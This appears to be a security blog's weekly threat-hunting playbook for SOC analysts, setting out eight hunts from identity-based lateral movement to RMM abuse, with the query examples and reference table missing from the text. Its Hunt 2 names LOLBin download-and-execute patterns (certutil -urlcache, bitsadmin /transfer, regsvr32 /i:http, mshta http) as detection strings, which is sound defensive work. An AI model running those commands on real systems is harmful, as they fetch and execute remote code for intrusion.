The CrowdStrike 2025 Threat Hunting Report found that 81% of hands-on-keyboard intrusions were malware-free — meaning four out of five active intrusions left no executable for an EDR signature to catch. The MITRE Engenuity ATT&CK Evaluations Enterprise 2026 round opens with the same conclusion in its scenario design notes: adversaries now rely on “abuse of trust rather than software exploitation, leveraging user interaction, valid credentials, and legitimate administrative capabilities.” If your SOC is still waiting for alerts to fire, you are watching the wrong door.
This is what makes weekly threat hunting non-negotiable in 2026. The slow, identity-led, living-off-the-land intrusions that dominate the current landscape do not trip thresholds. They look like work. The only way to find them is to go looking — with a structured playbook, a defined cadence, and queries written against the techniques adversaries are actually using right now. What follows is a working set: the weekly hunts that consistently surface real activity, why each one matters in 2026 specifically, and how to write the queries against the platforms most SOCs already own.
Why Weekly Cadence, Not Daily or Quarterly
Hunting cadence is a tradeoff between analyst fatigue and dwell time. The Picus Red Report 2026, drawn from analysis of over 1,084,718 malware samples, shows that adversaries now optimize for persistence over speed — Boot or Logon Autostart Execution (T1547) climbed from the bottom of the top-ten list into seventh place because attackers want to survive reboots, patch cycles, and analyst shift changes. Quarterly hunts let that persistence mature. Daily hunts burn out the team and produce shallow results.
Weekly cadence hits the useful middle. It catches persistence that established itself between hunts, it gives analysts time to baseline what “normal” looks like across a seven-day window, and it produces a rhythm where each hunt feeds the next week’s hypotheses. Run the same playbook every Monday. Document deltas. Promote anything that consistently surfaces real findings into a scheduled analytic rule and replace it in the playbook with a fresh hypothesis.
The hunts below assume a SIEM or XDR with at least 30 days of endpoint, identity, and network telemetry — Microsoft Sentinel, Splunk, Elastic, or equivalent. Query syntax varies; the hunting logic does not.
Hunt 1: Identity-Driven Lateral Movement Through Valid Accounts
Unit 42’s 2026 Global Incident Response Report attributes 65% of initial access to identity-based techniques and finds identity weaknesses present in 90% of incidents. Lateral movement now looks like authentication, not exploitation. The hunt: surface accounts logging into hosts they do not normally touch, especially during off-hours, and especially through interactive logon types.
The skeleton in KQL against SecurityEvent:
This pattern — count distinct destinations per account this week, then anti-join against a 60-day baseline of accounts that already touch many hosts — surfaces accounts whose breadth changed. Service accounts and admins will dominate the baseline; what’s left is what matters. Pivot from any hit into 4672 (special privileges assigned), 4768/4769 (Kerberos ticket activity), and any 4648 (explicit credential logon) involving the same account.
Hunt 2: Process Injection and LOLBin Abuse
T1055 (Process Injection) holds the #1 spot for the third consecutive year in the Picus Red Report 2026. T1059 (Command and Scripting Interpreter) sits at #2. Together they dominate post-compromise activity because they let attackers run inside trusted processes — svchost.exe, explorer.exe, lsass.exe — using binaries already signed by Microsoft.
The weekly hunt has two halves. First, suspicious child-process relationships: winword.exe spawning powershell.exe, mshta.exe invoking cmd.exe, rundll32.exe launching network connections. Second, signed Microsoft binaries doing things they should not — certutil.exe -urlcache, bitsadmin /transfer, regsvr32 /s /u /i:http://, mshta.exe http://. The LOLBAS Project maintains the canonical reference of these abuses; pin its current list and write a query that flags any process command line containing those patterns where the parent is not a known IT management tool.
The output will include legitimate admin scripts. That is the point — the hunt teaches you what your admins do. After three weeks of tuning, what’s left is genuinely anomalous.
Hunt 3: Persistence Through Scheduled Tasks and Autoruns
T1053.005 (Scheduled Task) and T1547 (Boot or Logon Autostart Execution) are the persistence mechanisms behind Tarrask, Emotet, IcedID, and most current ransomware operators. The CIS guidance on scheduled-task abuse remains the cleanest reference for the legitimate-versus-malicious distinction. The weekly hunt looks for tasks created in the last seven days, especially those with no author, with executable paths in user-writable directories (%APPDATA%, %TEMP%, C:\Users\Public), or with command lines that invoke a shell.
Splunk SPL against Windows event logs:
Pair this with a parallel hunt against HKLM\Software\Microsoft\Windows\CurrentVersion\Run and HKCU\...\Run registry writes for the same week. Anything new that points at a script interpreter or a binary in a temp path is worth a second look.
Hunt 4: Cloud Token Theft and OAuth Application Abuse
The MITRE ATT&CK Evaluations Enterprise 2026 explicitly flags cloud and infrastructure-focused environments as a primary risk surface. The dominant pattern: token theft via infostealers, then session replay against Microsoft 365, Google Workspace, or Okta from infrastructure the user has never used. Conditional access alone does not catch this — the attacker has the token.
The weekly hunt: aggregate sign-ins per user, identify sessions where the IP, ASN, or device fingerprint diverges from that user’s 30-day baseline, and prioritize any session that exercised admin consent grants or created new OAuth applications.
Layer a second query against AuditLogs filtered to Add OAuth2PermissionGrant, Consent to application, and Add app role assignment to user. Any consent grant in a week where Hunt 1 also surfaced anomalous lateral movement is a likely incident.
Hunt 5: Edge Device and Perimeter Exploitation Aftermath
CrowdStrike’s 2025 reporting and Barracuda’s Managed XDR data both flag edge-device exploitation as a primary initial-access vector — VPN appliances, firewalls, ADC products. The exploit itself happens before your SIEM sees anything; the hunt is for what comes next. Look for outbound connections from those edge devices that should never originate traffic, new admin accounts created on the appliance, and config changes outside change-management windows.
If your perimeter device exports syslog, the weekly hunt aggregates new outbound connections grouped by source device and destination ASN, anti-joined against the 60-day baseline. Anything new is investigated. Edge devices that never phoned out before should not start phoning out now.
The Weekly Hunt Reference
Pin this above the desk of whoever runs the Monday hunt rotation. Each row is one query, one MITRE technique, one telemetry source — designed to be run in under thirty minutes per hunt.
The eight hunts above can be split across the working week — two on Monday, two on Wednesday, four on Friday — or run in a single Monday block by a rotating analyst. The point is that they run on a schedule, and that the results are written down somewhere persistent so deltas across weeks are visible.
Three More Hunts Worth Considering Beyond the Core Five
Rare outbound DNS and C2 patterns (Hunt 6). Domains queried by fewer than three internal hosts over a rolling 30-day window are rare by definition; if one of them is also a high-entropy subdomain on a recently registered domain, that is a hunt finding before any IOC feed catches up. Add JA4 TLS fingerprinting where you have packet capture — uncommon fingerprints clustered on a handful of internal hosts is a strong C2 signal.
Service creation and SMB fan-out (Hunt 7). Event ID 7045 (service installed) plus 4697 (service created via service control manager) fanning out across more than three destination hosts within an hour, originating from a single account, is the textbook pattern for tools that propagate via SMB and remote service creation. The behaviour predates ransomware deployment in most current incidents.
RMM abuse (Hunt 8). Sophos’s 2026 reporting on DragonForce and similar groups documents direct compromise of legitimate remote management tools — SimpleHelp, Atera, ScreenConnect — to deploy ransomware across managed-service-provider customer fleets simultaneously. The hunt is straightforward: enumerate which RMM tools your IT actually deploys, then alert on any other RMM binary appearing on any endpoint.
Common Pitfalls
Hunting without a baseline. Every query above leans on comparison to historical activity. A SOC that runs the queries against last week with no longer-term reference will drown in false positives in week one and stop hunting in week three. Build the 30-to-60-day baseline first, even if it means delaying the first hunt cycle.
Treating findings as alerts. Hunting output is evidence, not detection. A weekly hunt that surfaces fifty rows is doing its job; the analyst’s job is to triage them down to the handful worth investigating. SOCs that try to convert every hunt into a real-time analytic rule end up with alert storms and abandon the practice.
Letting the playbook calcify. Threats change. The Picus Red Report 2026 notes that adversaries currently show “no notable uptick yet in the use of AI-driven malware techniques” — but that will not hold forever. Retire hunts that have not produced findings in three months. Replace them with hunts derived from this quarter’s threat intelligence. The OTRF ThreatHunter-Playbook project, updated in January 2026 to incorporate Agent Skills, is a useful source of current hunt templates.
Ignoring the report stage. The Plan-Execute-Report lifecycle from the OTRF framework treats reporting as load-bearing, not optional. A hunt that found nothing is still worth documenting — it tells you which techniques you have visibility on and which you do not. Visibility gaps are findings.
FAQ
Should we automate these hunts into scheduled analytics? Some, yes — once a query has produced consistent, high-fidelity findings for several weeks. But not all. The value of weekly hunting is partly that an analyst’s eyes are on the data, building intuition. Automate the noisy mechanical parts; keep the interpretation human.
Does this work without a SIEM? Partially. Hunts 2 and 3 can run against EDR telemetry alone if your EDR exposes a query language (Defender Advanced Hunting, CrowdStrike Falcon LogScale, SentinelOne Deep Visibility). Hunts 1, 4, and 5 require log aggregation across identity and network sources. If you do not have that aggregation, building it is the prerequisite.
How do AI-augmented hunting platforms change this? ISC2’s 2025 Workforce Study reports 48% of cybersecurity professionals experiencing exhaustion keeping current with threats. The agentic-SOC vendors — Dropzone AI, Prophet Security, others marketed at RSA 2026 — pitch hunt automation as a response. Reasonable for the mechanical execution; the hypothesis-formation and interpretation work still belongs to humans, and pretending otherwise produces investigations that look thorough but miss the unique-to-your-environment signals that matter most.
What about MITRE ATT&CK Evaluations Enterprise 2026? The 2026 round, with results publishing December 2026, introduces a Total Evaluation Score combining Detection Quality and Protection Quality. Use the published per-technique results as a sanity check on your own coverage — if a vendor your SOC depends on scored poorly on T1078 detection, your Hunt 1 is doing more work than you thought.
What to Do Monday Morning
Pick two hunts. Start with Hunt 1 (lateral movement) and Hunt 2 (LOLBin abuse) — they cover the techniques most likely to be active right now in most environments. Run them. Write down what surfaced, what you investigated, and what you concluded. Do it again the next Monday. By week four you will have a baseline, by week eight you will have either tuned the queries to fit your environment or replaced them with better ones, and by quarter end you will have a hunting practice — not a hunting plan that lives in a Confluence page no one reads.
The threats are not waiting for permission to mature in your network. Neither should the hunt.
